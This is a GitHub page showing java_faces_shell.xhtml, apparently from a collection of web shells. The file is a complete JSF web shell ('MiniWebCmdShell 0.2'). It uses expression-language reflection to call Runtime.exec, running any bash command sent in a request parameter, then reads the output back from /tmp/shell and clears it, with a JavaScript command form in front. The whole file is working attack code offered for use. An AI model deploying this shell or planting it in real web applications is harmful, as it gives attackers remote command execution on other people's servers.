forked from tennc/webshell
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathjava_faces_shell.xhtml
103 lines (89 loc) · 3.6 KB
/
java_faces_shell.xhtml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
<?xml version='1.0' encoding='UTF-8' ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:ui="http://java.sun.com/jsf/facelets"
xmlns:h="http://java.sun.com/jsf/html"
xmlns:c="http://xmlns.jcp.org/jsp/jstl/core">
<style type="text/css">
.wrapper{
border: 2px solid black;
background-color: #C0C0C0 ;
overflow:hidden;
margin: auto;
width: 50%;
word-wrap: break-word;
}
.field{
margin: 20px;
}
.output{
}
body{
background-color: #383838;
}
</style>
<body>
<c:choose>
<c:when test="${request.getParameter('do') != null}">
#{view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("exec","1,2".split(",").getClass()).invoke(view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),("/bin/bash,-c,".concat(request.getParameter("do")).concat(">/tmp/shell")).split(","))}
</c:when>
<c:when test="${request.getParameter('cmd') !=null}">
<code>
<i>${request.getParameter("cmd")}</i>:
<pre>#{ view.getClass().getClassLoader().loadClass("java.util.Scanner").getMethod("next").invoke(
view.getClass().getClassLoader().loadClass("java.util.Scanner").getMethod("useDelimiter", "a".getClass()).invoke(
view.getClass().getClassLoader().loadClass("java.util.Scanner").getConstructor(view.getClass().getClassLoader().loadClass("java.io.File").getConstructor("a".getClass()).newInstance("/tmp/shell").getClass()).newInstance(
view.getClass().getClassLoader().loadClass("java.io.File").getConstructor("a".getClass()).newInstance("/tmp/shell")
),"\\Z"
)
)}</pre>
</code>
</c:when>
<c:when test="${request.getParameter('clear')!= null}">
${view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("exec","1".getClass()).invoke(view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),"rm /tmp/shell")}
</c:when>
</c:choose>
<div class="wrapper">
<div class="field">
<center>----------------------------------------------------------</center>
<div class="output" id="output">
</div>
<center>----------------------------------------------------------</center>
<center>
<form onsubmit="return startMagic()">
<input autocomplete="off" id='cmd' name='cmd' size='100' placeholder='command' style="text-align:center; "/>
</form>
</center>
<center><font size="1"><i>Java Server Faces MiniWebCmdShell 0.2 by HeartLESS.</i></font></center>
</div>
</div>
</body>
<script type="text/javascript">
var xmlhttp;
if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
} else {// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
function startMagic(){
try{
//execution
xmlhttp.open("GET",location.pathname+"?do=" + encodeURI(document.getElementById("cmd").value),false);
xmlhttp.send();
console.log(xmlhttp.responseText);
//reading
xmlhttp.open("GET",location.pathname+"?cmd=" + encodeURI(document.getElementById("cmd").value),false);
xmlhttp.send();
a = xmlhttp.responseText.indexOf('<code>');
b = xmlhttp.responseText.indexOf('</code>');
document.getElementById('output').innerHTML = xmlhttp.responseText.substr(a+6,b-a -6);
//cleaning
xmlhttp.open("GET",location.pathname+"?clear",true);
xmlhttp.send();
}catch(e){
console.log(e);
}
return false;
}
</script>
</html>